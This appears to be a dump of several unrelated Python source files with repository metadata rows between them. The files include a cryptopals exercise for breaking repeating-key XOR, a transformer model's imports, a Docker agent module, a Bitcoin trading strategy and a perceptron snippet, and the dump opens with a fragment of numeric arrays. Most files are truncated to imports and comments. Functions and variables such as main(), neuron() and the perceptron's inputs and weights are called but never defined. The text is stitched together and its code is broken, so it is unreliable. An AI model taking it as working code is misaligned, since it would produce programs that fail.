[0.8681719101219889,
0.9351731626008992,
0.9083728156043438,
0.8750271283550077,
0.879929128403318,
0.9015597329057567,
0.9351297624958606,
0.9459250442159328,
0.9459717143364927,
0.8760802380420646,
0.8343273948904422,
0.841497348083017,
0.8033200314745574],
'AB010291.1_Bj':
[0.9671530980992109,
0.9858456107911616,
0.9438329817983037,
0.9150569322625627,
0.9372918193486423,
0.9630251291666885,
0.9481456308045444,
0.8823622232289046,
0.9077377632214376,
0.9325670957791264,
0.919398127767968,
0.9323907045444492,
0.9211964811945209]}
| 15.302158 | 88 | 0.608839 |
6a4a72c7391f2894d44f2f4cea661cdcb3c4d282
| 4,999 |
py
|
Python
|
lxmls/readers/simple_data_set.py
|
SimonSuster/lxmls-toolkit
|
6a57884f8b7c98da816a60eb88593e0a1585d434
|
[
"MIT"
] | 1 |
2015-09-20T05:16:38.000Z
|
2015-09-20T05:16:38.000Z
|
lxmls/readers/simple_data_set.py
|
daviddao/LxMLS-labs-solution
|
78413c1ee61752ca33988c454e3b2c27326e7063
|
[
"MIT"
] | null | null | null |
lxmls/readers/simple_data_set.py
|
daviddao/LxMLS-labs-solution
|
78413c1ee61752ca33988c454e3b2c27326e7063
|
[
"MIT"
] | null | null | null |
import numpy as np
# This class generates a 2D dataset with two classes, "positive" and "negative".
# Each class follows a Gaussian distribution.
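# A minimal sketch of such a generator (hypothetical, not the original class):
# positive = np.random.multivariate_normal(mean_pos, cov, n)   # class +1
# negative = np.random.multivariate_normal(mean_neg, cov, n)   # class -1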
| 43.469565 | 327 | 0.595319 |
6a4a8d86cea615c452f20cba99db27d3430077bf
| 4,840 |
py
|
Python
|
set1/c06_attack_repeating_key_xor.py
|
kangtastic/cryptopals
|
7014a08b836b3f9ebfdc889123ccf67406738dac
|
[
"WTFPL"
] | 1 |
2021-07-05T09:13:48.000Z
|
2021-07-05T09:13:48.000Z
|
set1/c06_attack_repeating_key_xor.py
|
kangtastic/cryptopals
|
7014a08b836b3f9ebfdc889123ccf67406738dac
|
[
"WTFPL"
] | null | null | null |
set1/c06_attack_repeating_key_xor.py
|
kangtastic/cryptopals
|
7014a08b836b3f9ebfdc889123ccf67406738dac
|
[
"WTFPL"
] | 1 |
2020-04-18T19:53:02.000Z
|
2020-04-18T19:53:02.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Break repeating-key XOR
#
# It is officially on, now.
#
# This challenge isn't conceptually hard, but it involves actual
# error-prone coding. The other challenges in this set are there to bring
# you up to speed. This one is there to qualify you. If you can do this
# one, you're probably just fine up to Set 6.
#
# There's a file here:
#
# http://cryptopals.com/static/challenge-data/6.txt
#
# It's been base64'd after being encrypted with repeating-key XOR.
#
# Decrypt it.
#
# Here's how:
#
# 1. Let KEYSIZE be the guessed length of the key; try values from 2 to
# (say) 40.
# 2. Write a function to compute the edit distance/Hamming distance between
# two strings. The Hamming distance is just the number of differing
# bits. The distance between:
#
# this is a test
#
# and
#
# wokka wokka!!!
#
# is 37. *Make sure your code agrees before you proceed.*
# 3. For each KEYSIZE, take the first KEYSIZE worth of bytes, and the
# second KEYSIZE worth of bytes, and find the edit distance between them.
# Normalize this result by dividing by KEYSIZE.
# 4. The KEYSIZE with the smallest normalized edit distance is probably the
# key. You could proceed perhaps with the smallest 2-3 KEYSIZE values.
# Or take 4 KEYSIZE blocks instead of 2 and average the distances.
# 5. Now that you probably know the KEYSIZE: break the ciphertext into
# blocks of KEYSIZE length.
# 6. Now transpose the blocks: make a block that is the first byte of every
# block, and a block that is the second byte of every block, and so on.
# 7. Solve each block as if it was single-character XOR. You already have
# code to do this.
# 8. For each block, the single-byte XOR key that produces the best looking
# histogram is the repeating-key XOR key byte for that block. Put them
# together and you have the key.
#
# This code is going to turn out to be surprisingly useful later on. Breaking
# repeating-key XOR ("Vigenère") statistically is obviously an academic
# exercise, a "Crypto 101" thing. But more people "know how" to break it than
# can actually break it, and a similar technique breaks something much more
# important.
#
# No, that's not a mistake.
#
# We get more tech support questions for this challenge than any of the
# other ones. We promise, there aren't any blatant errors in this text.
# In particular: the "wokka wokka!!!" edit distance really is 37.
#
import inspect
import os
import sys
from itertools import zip_longest
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(inspect.getfile(lambda: 0)))))
from util.loader import loader
from util.text import englishness, repeating_key_xor, single_byte_xor
# Lookup table for the number of 1 bits in a nibble. (Nybble, quartet, etc.)
NIBBLE_BITS = [0, 1, 1, 2, 1, 2, 2, 3, 1, 2, 2, 3, 2, 3, 3, 4]
def likely_key_sizes(bs, lower=2, upper=40, n=3):
"""Finds a repeating-key-XOR'd ciphertext's most likely key sizes."""
sizes = {}
for size in range(lower, upper + 1):
normalized_distance = 0
for i in range(0, len(bs) - size * 2, size * 2):
bs1, bs2 = bs[i : i + size], bs[i + size : i + size * 2]
normalized_distance += hamming_distance(bs1, bs2) / 2
sizes.update({size: normalized_distance})
return sorted(sizes, key=lambda k: sizes[k])[:n]
def hamming_distance(bs1, bs2):
"""Finds the Hamming distance between two bytestrings."""
distance = 0
for b1, b2 in zip_longest(bs1, bs2, fillvalue=0):
b = b1 ^ b2
distance += NIBBLE_BITS[b >> 4] + NIBBLE_BITS[b & 0xF]
return distance
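# Sanity check from the challenge text above ("Make sure your code agrees"):
# hamming_distance(b"this is a test", b"wokka wokka!!!") == 37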
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
# Output:
#
# Key: 'Terminator X: Bring the noise' (29 bytes)
#
# I'm back and I'm ringin' the bell
# A rockin' on the mike while the fly girls yell
# In ecstasy in the back of me
# Well that's my DJ Deshay cuttin' all them Z's
# Hittin' hard and the girlies goin' crazy
# Vanilla's on the mike, man I'm not lazy.
#
# <remainder of output omitted>
#
| 32.266667 | 94 | 0.667355 |
6a4a939ebfe3446641070ee1531f5dae14b39a3f
| 26,798 |
py
|
Python
|
c2nl/models/transformer.py
|
kopf-yhs/ncscos
|
8248aaad32d4d19c01d070bf0dfba7aab849ba1d
|
[
"MIT"
] | 22 |
2021-05-22T19:58:39.000Z
|
2022-03-20T03:43:51.000Z
|
c2nl/models/transformer.py
|
kopf-yhs/ncscos
|
8248aaad32d4d19c01d070bf0dfba7aab849ba1d
|
[
"MIT"
] | 1 |
2021-07-17T13:15:33.000Z
|
2022-02-24T13:59:14.000Z
|
c2nl/models/transformer.py
|
kopf-yhs/ncscos
|
8248aaad32d4d19c01d070bf0dfba7aab849ba1d
|
[
"MIT"
] | 2 |
2021-05-10T05:18:00.000Z
|
2022-02-24T19:01:50.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as f
from prettytable import PrettyTable
from c2nl.modules.char_embedding import CharEmbedding
from c2nl.modules.embeddings import Embeddings
from c2nl.modules.highway import Highway
from c2nl.encoders.transformer import TransformerEncoder
from c2nl.decoders.transformer import TransformerDecoder
from c2nl.inputters import constants
from c2nl.modules.global_attention import GlobalAttention
from c2nl.modules.copy_generator import CopyGenerator, CopyGeneratorCriterion
from c2nl.utils.misc import sequence_mask
| 42.334913 | 98 | 0.504926 |
6a4c4690f289d0da27d1fd0d344a2302e88669f6
| 3,344 |
py
|
Python
|
cattle/plugins/docker/delegate.py
|
cjellick/python-agent
|
6991369e309d050a43cba770df6e8ddd758f671d
|
[
"Apache-2.0"
] | 8 |
2015-07-20T15:29:25.000Z
|
2018-06-27T13:30:13.000Z
|
cattle/plugins/docker/delegate.py
|
cjellick/python-agent
|
6991369e309d050a43cba770df6e8ddd758f671d
|
[
"Apache-2.0"
] | 47 |
2015-07-13T23:47:35.000Z
|
2020-07-31T16:06:34.000Z
|
cattle/plugins/docker/delegate.py
|
cjellick/python-agent
|
6991369e309d050a43cba770df6e8ddd758f671d
|
[
"Apache-2.0"
] | 21 |
2015-08-21T01:58:47.000Z
|
2021-01-24T11:59:25.000Z
|
import logging
from cattle import Config
from cattle.utils import reply, popen
from .compute import DockerCompute
from cattle.agent.handler import BaseHandler
from cattle.progress import Progress
from cattle.type_manager import get_type, MARSHALLER
from . import docker_client
import subprocess
import os
import time
log = logging.getLogger('docker')
| 27.636364 | 78 | 0.535287 |
6a4da8a95b67b63d32309af5c23df6977103484a
| 6,391 |
py
|
Python
|
bitraider/strategy.py
|
ehickox2012/bitraider
|
dcc695b93dc1c22415780e3f5ff9f7ee29d6988c
|
[
"MIT"
] | 2 |
2015-03-05T22:28:43.000Z
|
2015-03-12T23:07:54.000Z
|
bitraider/strategy.py
|
ehickox/bitraider
|
dcc695b93dc1c22415780e3f5ff9f7ee29d6988c
|
[
"MIT"
] | 2 |
2015-04-05T21:13:59.000Z
|
2015-04-05T21:16:05.000Z
|
bitraider/strategy.py
|
ehickox/bitraider
|
dcc695b93dc1c22415780e3f5ff9f7ee29d6988c
|
[
"MIT"
] | 1 |
2015-08-16T18:53:00.000Z
|
2015-08-16T18:53:00.000Z
|
import sys
import pytz
#import xml.utils.iso8601
import time
import numpy
from datetime import date, datetime, timedelta
from matplotlib import pyplot as plt
from exchange import cb_exchange as cb_exchange
from exchange import CoinbaseExchangeAuth
from abc import ABCMeta, abstractmethod
| 42.324503 | 267 | 0.636833 |
dbde179232e6a3f834cec05a67d959715c486849
| 715 |
py
|
Python
|
neural-networks.py
|
PacktPublishing/Python-Deep-Learning-for-Beginners-
|
90f110158cbf0ce02fd4d5d09e3b2034428d9992
|
[
"MIT"
] | 7 |
2019-02-16T02:52:12.000Z
|
2021-11-08T13:10:46.000Z
|
neural-networks.py
|
PacktPublishing/Python-Deep-Learning-for-Beginners-
|
90f110158cbf0ce02fd4d5d09e3b2034428d9992
|
[
"MIT"
] | null | null | null |
neural-networks.py
|
PacktPublishing/Python-Deep-Learning-for-Beginners-
|
90f110158cbf0ce02fd4d5d09e3b2034428d9992
|
[
"MIT"
] | 14 |
2018-11-18T04:33:38.000Z
|
2021-08-14T03:29:18.000Z
|
import numpy as np
# Perceptron
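# The `neuron` helper used below is not defined in this excerpt; a minimal sketch,
# assuming a sigmoid activation over a weighted sum (hypothetical, for illustration):
def neuron(inputs, weights):
    # Weighted sum of the inputs passed through a sigmoid non-linearity
    return 1.0 / (1.0 + np.exp(-np.dot(inputs, weights)))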
neural_network = neuron(neuron(inputs, weights1), weights2)
| 23.064516 | 59 | 0.682517 |